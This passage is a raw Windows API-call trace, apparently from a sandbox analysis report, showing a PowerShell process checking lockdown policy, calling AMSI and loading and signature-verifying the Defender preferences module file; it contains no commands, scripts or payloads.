OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b62b798 | out: TokenHandle=0x1b62b798*=0x788) returned 1 [0333.647] CloseHandle (hObject=0x788) returned 1 [0333.647] GetCurrentProcess () returned 0xffffffffffffffff [0333.648] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b62b7d8 | out: TokenHandle=0x1b62b7d8*=0x788) returned 1 [0333.648] CloseHandle (hObject=0x788) returned 1 [0334.267] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0x3bffe33b, Data2=0xd3d7, Data3=0x49c9, Data4=([0]=0xb2, [1]=0x4e, [2]=0x4a, [3]=0x15, [4]=0xe2, [5]=0xfa, [6]=0x5b, [7]=0x6f))) returned 0x0 [0334.275] AmsiScanBuffer () returned 0x80070015 [0334.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\EventLog\\ProtectedEventLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62c748 | out: phkResult=0x1b62c748*=0x0) returned 0x2 [0334.934] EtwEventWriteTransfer () returned 0x0 [0334.939] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c060, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0335.026] EtwEventActivityIdControl () returned 0x0 [0335.026] EtwEventActivityIdControl () returned 0x0 [0335.026] EtwEventActivityIdControl () returned 0x0 [0335.035] EtwEventActivityIdControl () returned 0x0 [0336.332] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c180, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0336.447] EtwEventActivityIdControl () returned 0x0 [0336.447] EtwEventActivityIdControl () returned 0x0 [0336.447] EtwEventActivityIdControl () returned 0x0 [0336.575] EtwEventActivityIdControl () returned 0x0 [0336.575] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x55979ff4, Data2=0xbd5c, Data3=0x48be, Data4=([0]=0x9b, [1]=0xc1, [2]=0x8c, [3]=0xef, [4]=0x81, [5]=0xe6, [6]=0x2c, [7]=0x10))) returned 0x0 [0336.576] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xcb867e54, Data2=0xd9db, Data3=0x4463, Data4=([0]=0xaa, [1]=0xb5, [2]=0xf7, [3]=0x28, [4]=0xc6, [5]=0xed, [6]=0x60, [7]=0xa2))) returned 0x0 [0336.577] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c180, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0336.577] EtwEventActivityIdControl () returned 0x0 [0336.577] EtwEventActivityIdControl () returned 0x0 [0336.577] EtwEventActivityIdControl () returned 0x0 [0336.599] EtwEventActivityIdControl () returned 0x0 [0336.690] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml")) returned 0x20 [0336.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0336.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0336.691] CoTaskMemAlloc (cb=0x20c) returned 0x1b6473f0 [0336.691] GetSystemDirectoryW (in: lpBuffer=0x1b6473f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0336.691] CoTaskMemFree (pv=0x1b6473f0) [0336.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0336.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0336.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0336.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0336.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0336.692] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0336.692] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x788) returned 0x0 [0336.693] RegQueryValueExW (in: hKey=0x788, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0336.693] RegCloseKey (hKey=0x788) returned 0x0 [0336.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0336.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0336.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0336.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2455520 | out: lpFileInformation=0x2455520*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2a55cfb3, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992)) returned 1 [0336.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0336.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0336.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0336.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0336.694] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2a55cfb3, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992)) returned 1 [0336.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c978) returned 1 [0336.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0336.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0336.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0336.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0336.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0336.695] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2a55cfb3, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992)) returned 1 [0336.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0336.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0336.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0336.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0336.695] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x788 [0336.696] GetFileType (hFile=0x788) returned 0x1 [0336.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0336.696] GetFileType (hFile=0x788) returned 0x1 [0336.696] WTGetSignatureInfo () returned 0x0 [0336.747] CertDuplicateCertificateContext (pCertContext=0x1a852270) returned 0x1a852270 [0336.747] CryptCATHandleFromStore () returned 0x6f8a20 [0336.747] WTHelperGetProvSignerFromChain () returned 0x6f8950 [0336.747] WTHelperGetProvCertFromChain () returned 0x6fbee0 [0336.748] CertDuplicateCertificateContext (pCertContext=0x1a8525f0) returned 0x1a8525f0 [0336.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d0) returned 0x0 [0336.749] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0336.749] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x2455d88, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0336.749] RegCloseKey (hKey=0x7d0) returned 0x0 [0336.749] CoTaskMemAlloc (cb=0x10) returned 0x1a8a7af0 [0336.749] CoTaskMemAlloc (cb=0x50) returned 0x1a89a980 [0336.749] WinVerifyTrust () returned 0x0 [0336.753] CoTaskMemFree (pv=0x1a89a980) [0336.753] CoTaskMemFree (pv=0x1a8a7af0) [0336.753] CertFreeCertificateContext (pCertContext=0x1a852270) returned 1 [0336.753] CloseHandle (hObject=0x788) returned 1 [0336.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0336.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0336.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0336.754] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x788 [0336.754] GetFileType (hFile=0x788) returned 0x1 [0336.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62ccb8) returned 1 [0336.754] GetFileType (hFile=0x788) returned 0x1 [0336.755] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0336.755] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.755] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0336.755] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.756] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0336.756] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.756] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0336.756] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.757] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x4000 [0336.757] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.757] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x5000 [0336.757] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.758] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x6000 [0336.758] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.758] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x7000 [0336.758] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.759] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x8000 [0336.759] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.759] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x9000 [0336.759] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.759] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xa000 [0336.759] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.760] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xb000 [0336.760] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.760] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xc000 [0336.760] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.760] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xd000 [0336.761] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.761] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xe000 [0336.761] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0336.763] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xf000 [0336.763] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x992, lpOverlapped=0x0) returned 1 [0336.763] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xf992 [0336.764] ReadFile (in: hFile=0x788, lpBuffer=0x24563aa, nNumberOfBytesToRead=0x26e, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x24563aa*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0336.764] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0xf992 [0336.764] ReadFile (in: hFile=0x788, lpBuffer=0x2456ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2456ec8*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0336.767] CoTaskMemAlloc (cb=0x20c) returned 0x1b64a2b0 [0336.768] GetSystemDirectoryW (in: lpBuffer=0x1b64a2b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0336.768] CoTaskMemFree (pv=0x1b64a2b0) [0336.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0336.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0336.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0336.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0336.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0336.768] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0336.769] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7c4) returned 0x0 [0336.769] RegQueryValueExW (in: hKey=0x7c4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0336.769] RegCloseKey (hKey=0x7c4) returned 0x0 [0336.769] CloseHandle (hObject=0x788) returned 1 [0336.860] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.860] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.862] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.862] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.862] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.862] 